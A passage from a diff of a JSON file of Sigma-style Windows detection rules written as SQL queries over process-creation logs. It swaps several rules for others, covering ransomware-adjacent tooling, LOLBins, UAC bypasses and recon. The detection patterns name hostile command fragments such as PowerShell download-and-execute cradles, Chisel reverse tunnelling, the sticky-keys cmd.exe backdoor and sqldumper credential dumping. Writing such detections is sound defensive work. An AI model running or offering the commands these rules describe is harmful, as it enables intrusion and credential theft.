'%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_pua_process_hacker.yml" }, { - "title": "Wlrmdr Lolbin Use as Launcher", - "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", 
+ "title": "Suspicious Electron Application Child Processes", + "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", "status": "experimental", - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", - "author": "frack113, manasmbellani", + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((NewProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentProcessName = '-')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\discord.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_lolbin_wlrmdr.yml" + "filename": "proc_creation_win_susp_electron_app_children.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", - "id": "536e2947-3729-478c-9903-745aaffe60d2", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects scheduled task 
creations or modification on a suspicious schedule type", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object 
System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_invocation_specific.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "HackTool - Jlaive In-Memory Assembly Execution", - "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. 
If you experience a lot of FP you could reduce the level to medium" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% 
\"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. 
This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "status": "experimental", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration use but user and host must be investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": 
"Detects a set of suspicious network related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
(((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Dumping Process via Sqldumper.exe", - "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "status": "test", - "description": "Detects process dump via legitimate sqldumper.exe binary", - "author": "Kirill Kiryanov, oscd.community", + "title": "Suspicious Cabinet File Execution Via Msdt.EXE", + "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "status": "experimental", + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate MSSQL Server actions" + "Legitimate usage of \".diagcab\" files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" + "filename": "proc_creation_win_msdt_susp_cab_options.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys 
executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_chisel.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Suspicious Msiexec Execute Arbitrary DLL", - "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", - "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "status": "test", + "description": "Detects suspicious 
command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' 
OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_execute_dll.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "File Download Via Curl.EXE", - "id": "9a517fca-4ba3-4629-9278-a68694697b81", - "status": "experimental", - "description": "Detects file download using curl.exe", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "status": "test", + "description": "Detects the execution of msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity", - "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_curl_download.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "Use of VSIISExeLauncher.exe", - "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", "status": "experimental", - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", - "id": "74403157-20f5-415d-89a7-c505779585cf", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "status": "test", - "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. 
